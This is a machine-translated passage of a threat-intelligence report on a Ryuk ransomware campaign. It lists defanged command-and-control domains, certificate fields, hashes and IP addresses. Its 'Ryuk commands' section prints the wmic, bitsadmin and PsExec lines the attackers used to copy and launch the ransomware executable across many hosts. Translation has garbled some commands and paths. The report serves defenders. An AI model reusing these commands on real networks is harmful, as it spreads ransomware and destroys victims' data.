C=US、ST=TX、L=テキサス、O=lol、OU=、CN=sobcase[.]com |
188f603570e7fa81b92906af7af177dc |
10/7/20 |
5.2.64.144:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=unlockwsa[.]com |
22d7f35e624b7bcee7bb78ee85a7945c |
10/7/20 |
88.119.174.139:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=serviceupdatter[.]com |
12c6e173fa3cc11cc6b09b01c5f71b0c |
10/7/20 |
88.119.174.133:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-boosterr[.]com |
28435684c76eb5f1c4b48b6bbc4b22af |
10/7/20 |
88.119.175.214:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=dotmaingame[.]com |
9c2d64cf4e8e58ef86d16e9f77873327 |
10/7/20 |
5.2.72.200:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=wodemayaa[.]com |
f6f484baf1331abf55d06720de827190 |
10/7/20 |
5.2.79.10:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=hybriqdjs[.]com |
d8eacda158594331aec3ad5e42656e35 |
10/7/20 |
5.2.79.12:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=gunsdrag[.]com |
29032dd12ea17fc37ffff1ee94cc5ba8 |
10/7/20 |
5.2.79.121:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=gungameon[.]com |
eaf32b1c2e31e4e7b6d5c3e6ed6bff3d |
10/7/20 |
5.2.64.174:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=quwasd[.]com |
442680006c191692fcc3df64ec60d8fa |
10/7/20 |
5.2.64.172:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=remotessa[.]com |
0593cbf6b3a3736a17cd64170e02a78d |
10/7/20 |
5.2.64.167:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=secondlivve[.]com |
38df81824bd8cded4a8fa7ad9e4d1f67 |
10/7/20 |
5.2.64.182:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=luckyhunterrs[.]com |
99dbe71ca7b9d4a1d9f722c733b3f405 |
10/7/20 |
88.119.171.97:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=servicesupdater[.]com |
7d7199ffa40c50b6e5b025b8cb2661b2 |
10/7/20 |
88.119.171.96:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=servicemount[.]com |
f433d25a0dad0def0510cd9f95886fdb |
10/7/20 |
96.9.209.217:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=fastbloodhunter[.]com |
e84c7aa593233250efac903c19f3f589 |
10/7/20 |
69.61.38.132:443 |
C=米国、ST=CA、L=マウンテンビュー、O=オフィス、OU=、CN=カンフーパンダサ[.]com |
e6e80f6eb5cbfc73cde40819007dcc53 |
10/13/20 |
45.147.230.131:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=bakcup-monster[.]com |
4fdeab3dad077589d52684d35a9ea4ab |
10/13/20 |
45.147.229.92:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=bakcup-checker[.]com |
b70cdb49b26e6e9ba7d0c42d5f3ed3cb |
10/13/20 |
45.147.229.68:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backup-simple[.]com |
57024c1fe5c4acaf30434ba1f58f9144 |
10/13/20 |
45.147.229.52:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=バックアップリーダー[.]com |
ec5496048f1962494d239d377e53db0c |
10/13/20 |
45.147.229.44:443 |
C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com |
938593ac1c8bdb2c5256540d7c8476c8 |
10/14/20 |
45.147.230.87:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=nasmastrservice[.]com |
cced46e0a9b6c382a97607beb95f68ab |
10/14/20 |
45.147.230.159:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=サービスリーダー[.]com |
e912980fc8e9ec1e570e209ebb163f65 |
10/14/20 |
45.147.230.141:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-checker[.]com |
39d7160ce331a157d3ecb2a9f8a66f12 |
10/14/20 |
45.147.230.140:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-simple-helper[.]com |
d9ca73fe10d52eef6952325d102f0138 |
10/14/20 |
45.147.230.133:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-leader[.]com |
920d04330a165882c8076c07b00e1d93 |
10/14/20 |
45.147.230.132:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=boost-servicess[.]com |
771463611a43ee35a0ce0631ef244dee |
10/14/20 |
45.147.229.180:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=elephantdrrive[.]com |
1e4a794da7d3c6d0677f7169fbe3b526 |
10/14/20 |
45.147.230.159:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=サービスリーダー[.]com |
9c7fe10135f6ad96ded28fac51b79dfd |
10/15/20 |
45.147.230.132:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=boost-servicess[.]com |
a78c0e2920e421667ae734d923dd5ca6 |
10/15/20 |
45.138.172.95:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-hellper[.]com |
a0b2378ceae498f46401aadeb278fb31 |
10/16/20 |
108.62.12.119:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=top-backuphelper[.]com |
e95bb7804e3add830496bd36664ed339 |
10/16/20 |
108.62.12.105:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=best-nas[.]com |
8d5dc95b3bd4d16a3434b991a09bf77e |
10/16/20 |
108.62.12.114:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=top-backupservice[.]com |
d5de2f5d2ca29da1724735cdb8fbc63f |
10/16/20 |
108.62.12.116:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=bestservicehelper[.]com |
9c7396ecd107ee8f8bf5521afabb0084 |
10/16/20 |
45.147.230.141:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=service-checker[.]com |
1134a6f276f4297a083fc2a605e24f70 |
10/16/20 |
45.147.230.140:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-simple-helper[.]com |
2150045f476508f89d9a322561b28ff9 |
10/16/20 |
45.147.230.133:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=nas-leader[.]com |
f4ddc4562e5001ac8fdf0b7de079b344 |
10/19/20 |
74.118.138.137:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=top3-services[.]com |
75fb6789ec03961c869b52336fa4e085 |
10/19/20 |
74.118.138.115:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=simple-backupbooster[.]com |
9f5e845091015b533b59fe5e8536a435 |
10/19/20 |
108.177.235.53:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=best-backup[.]com |
4b78eaa4f2748df27ebf6655ea8a7fe9 |
10/19/20 |
74.118.138.138:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topbackup-helper[.]com |
bcccda483753c82e62482c55bc743c16 |
2020/10/21 |
45.153.241.1:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backup1helper[.]com |
672c66dd4bb62047bb836bd89d2e1a65 |
2020/10/21 |
45.153.240.240:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=checktodrivers[.]com |
6825409698a326cc319ca40cd85a602e |
2020/10/21 |
45.153.240.194:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=driver1master[.]com |
7f9be0302da88e0d322e5701d52d4128 |
2020/10/21 |
45.153.240.138:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=boost-yourservice[.]com |
2c6a0856d1a75b303337ac0807429e88 |
2020/10/21 |
45.153.240.136:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=backup1master[.]com |
6559dbf8c47383b7b493500d7ed76f6a |
2020/10/23 |
45.153.240.157:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=driver1updater[.]com |
7bd044e0a6689ef29ce23e3ccb0736a3 |
2020/10/23 |
45.153.240.178:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=service1updater[.]com |
9859a8336d097bc30e6e5c7a8279f18e |
2020/10/23 |
45.153.240.220:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=driverdwl[.]com |
43fb2c153b59bf46cf6f67e0ddd6ef51 |
2020/10/23 |
45.153.240.222:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=viewdrivers[.]com |
22bafb30cc3adaa84fef747d589ab235 |
2020/10/23 |
45.153.241.134:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=backups1helper[.]com |
31e87ba0c90bb38b986af297e4905e00 |
2020/10/23 |
45.153.241.138:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=driver1downloads[.]com |
f8a14846b7da416b14303bced5a6418f |
2020/10/23 |
45.153.241.146:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=servicehel[.]com |
01abdaf870d859f9c1fd76f0b0328a2b |
2020/10/23 |
45.153.241.153:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=service-hel[.]com |
c2eaf144e21f3aef5fe4b1502d318ba6 |
2020/10/23 |
45.153.241.158:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=servicereader[.]com |
de54af391602f3deea19cd5e1e912316 |
2020/10/23 |
45.153.241.167:443 |
C=US,ST=TX,L=テキサス州,O=US,OU=,CN=view-backup[.]com |
5f6fa19ffe5735ff81b0e7981a864dc8 |
2020/10/23 |
45.147.231.222:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=top3servicebooster[.]com |
ff54a7e6f51a850ef1d744d06d8e6caa |
2020/10/23 |
45.153.241.141:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=service1view[.]com |
4cda9d0bece4f6156a80967298455bd5 |
2020/10/26 |
74.118.138.139:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topbackupintheworld[.]com |
e317485d700bf5e8cb8eea1ec6a72a1a |
2020/10/26 |
108.62.12.12:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topservice-masters[.]com |
e0022cbf0dd5aa597fee73e79d2b5023 |
2020/10/26 |
108.62.12.121:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=topservicebooster[.]com |
44e7347a522b22cdf5de658a4237ce58 |
2020/10/26 |
172.241.27.65:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backup1services[.]com |
cd3e51ee538610879d6fa77fa281bc6f |
2020/10/26 |
172.241.27.68:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=backupmaster-service[.]com |
04b6aec529b3656040a68e17afdabfa4 |
2020/10/26 |
172.241.27.70:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=backupmasterservice[.]com |
200c25c2b93203392e1acf5d975d6544 |
2020/10/26 |
45.153.241.139:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=driver-boosters[.]com |
9d7c52c79f3825baf97d1318bae3ebe2 |
2020/10/27 |
45.153.241.14:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=service1update[.]com |
5bae28b0d0e969af2c0eda21abe91f35 |
2020/10/28 |
190.211.254.154:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=driverjumper[.]com |
a1e62e7e547532831d0dd07832f61f54 |
2020/10/28 |
81.17.28.70:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=service1boost[.]com |
67c7c75d396988ba7d6cd36f35def3e4 |
2020/10/28 |
81.17.28.105:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=idrivehepler[.]com |
880e59b44e7175e62d75128accedb221 |
2020/10/28 |
179.43.160.205:443 |
C=US,ST=TX,L=テキサス,O=lol,OU=,CN=idrivedownload[.]com |
cdea09a43bef7f1679e9cd1bbeb4b657 |
2020/10/28 |
179.43.158.171:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=idrivefinder[.]com |
512c6e39bf03a4240f5a2d32ee710ce5 |
2020/10/28 |
179.43.133.44:443 |
C=US、ST=TX、L=テキサス、O=lol、OU=、CN=idrivedwn[.]com |
87f3698c743f8a1296babf9fbebafa9f |
2020/10/28 |
179.43.128.5:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=idrivecheck[.]com |
6df66077378c5943453b36bd3a1ed105 |
2020/10/28 |
179.43.128.3:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=idriveupdate[.]com |
9706fd787a32a7e94915f91124de3ad3 |
2020/10/28 |
81.17.28.122:443 |
C=US,ST=TX,L=テキサス州,O=lol,OU=,CN=idriveview[.]com |
0e1b0266de2b5eaf427f5915086b4d7c |
リュークコマンド
start wmic /node:@C:share$comps1.txt /user:[編集済] /password:[編集済] プロセス コール create “cmd.exe /c bitsadmin /transfer vVv [編集済]share$vVv .exe %APPDATA%vVv.exe & %APPDATA%vVv.exe” start PsExec.exe /accepteula @C:share$comps1.txt -u [編集済み] -p [編集済み] cmd /c COPY “[編集済み]share$vVv.exe” “C:windows tempvVv.exe” start PsExec.exe -d @C:share$comps1.txt -u [編集済み] -p [編集済み] cmd /cc:windowstempvVv.exe |
テクニックの検出
FireEye は、プラットフォーム全体でこのアクティビティを検出します。次の表には、このアクティビティが発生する前に利用可能だった検出のより大きなリストからの特定の検出名がいくつか含まれています。
プラットホーム |
署名名 |
エンドポイント セキュリティ |
|
ネットワーク セキュリティと電子メール セキュリティ |
|
参照: https://www.mandiant.com/resources/blog/kegtap-and-singlemalt-with-a-ransomware-chaser
Comments